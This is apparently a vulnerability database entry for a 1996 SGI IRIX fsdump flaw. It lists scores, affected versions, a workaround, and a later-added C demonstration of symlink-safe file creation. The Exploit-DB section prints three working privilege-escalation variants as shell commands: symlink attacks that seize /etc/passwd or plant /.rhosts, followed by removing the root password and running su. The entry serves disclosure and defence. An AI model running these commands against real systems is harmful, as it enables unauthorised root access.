Published: 1996-12-03 00:00:00
Revised: 2008-09-09 08:33:36

[Original] fsdump command in IRIX allows local users to obtain root access by modifying sensitive files.

[CNNVD] IRIX fsdump command permissions and access control vulnerability (CNNVD-199612-002)


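- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can cause a complete system outage]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]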

- CPE (affected platforms and products)

cpe:/o:sgi:irix:6.0.1  SGI IRIX 6.0.1
cpe:/o:sgi:irix:6.2  SGI IRIX 6.2
cpe:/o:sgi:irix:5.2  SGI IRIX 5.2
cpe:/o:sgi:irix:6.0  SGI IRIX 6.0
cpe:/o:sgi:irix:5.3  SGI IRIX 5.3
cpe:/o:sgi:irix:5.1.1  SGI IRIX 5.1.1
cpe:/o:sgi:irix:5.1  SGI IRIX 5.1
cpe:/o:sgi:irix:6.1  SGI IRIX 6.1

- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(UNKNOWN)  SGI  19970301-01-P

- Vulnerability information

IRIX fsdump command permissions and access control vulnerability
High risk  Unknown
1996-12-03 00:00:00 2005-05-02 00:00:00

- Advisories and patches


- Vulnerability information (19280)

SGI IRIX <= 6.2 fsdump Vulnerability (EDBID:19280)
irix local
1996-12-03 Verified
0 Jaechul Choe
N/A

A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privilege.

Variant 1:
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
(count to three, and hit ctrl-c)
irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
irix% tail -8 /etc/passwd
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null

Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
irix% vi /etc/passwd # remove the encrypted root password
irix% chgrp sys /etc/passwd
irix% chown root /etc/passwd
irix% su -

Variant 2:

cp /etc/passwd /tmp/passwd
ln -s /etc/passwd rfd.lock
/var/rfindd/fsdump -F/tmp/rfd /
/var/rfindd/fsdump -L/etc/passwd -F/tmp/rfd /

Variant 3:
cd /tmp
ln -s /.rhosts fsdump.dir
/var/rfindd/fsdump -Fgimme /
ls -al /.rhosts
rm -f fsdump.dir fsdump.pag gimme


- Vulnerability information

IRIX fsdump File Modification Privilege Escalation
Local Access Required Race Condition
Loss of Integrity Workaround
Exploit Public

- Vulnerability description

IRIX contains a flaw that may allow a malicious local user to overwrite arbitrary files on the system. The issue is due to the fsdump program creating files insecurely. It is possible for a user to use a symlink style attack to manipulate arbitrary files, resulting in a loss of integrity.
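
The class of flaw described above (a privileged program creating files at a path where a symlink may already sit) can be shown by contrasting a naive open with a hardened one. This is an added example, not fsdump's code or anything from the advisory; the function names and temporary paths are hypothetical, and the scenario is constructed inside a private temp directory.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Naive pattern: follows a symlink planted at `path` and truncates its target. */
int naive_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened pattern: create a new file only, never through a symlink,
 * then confirm the descriptor is a regular file with a single link. */
int safe_create(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario in a private temp directory. Returns 1 when the
 * hardened open refused the symlink and the naive open emptied the target. */
int demo(void)
{
    char dir[] = "/tmp/fsdemoXXXXXX", target[64], lnk[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/protected", dir);
    snprintf(lnk, sizeof lnk, "%s/out.lock", dir);
    int fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "data", 4) != 4 || symlink(target, lnk) != 0) return -1;
    close(fd);
    int safe = safe_create(lnk);    /* refused: path already exists as a symlink */
    int naive = naive_create(lnk);  /* succeeds by following the link */
    int ok = (safe == -1 && naive >= 0 && stat(target, &st) == 0 && st.st_size == 0);
    if (naive >= 0) close(naive);
    unlink(lnk); unlink(target); rmdir(dir);
    return ok;
}

int main(void) { printf("demo: %d\n", demo()); return 0; }
```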

- Timeline

1996-11-28 Unknown
1996-11-28 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: remove the setuid bit from the fsdump program, or remove the rfindd subsystem.

- Related references

- Vulnerability author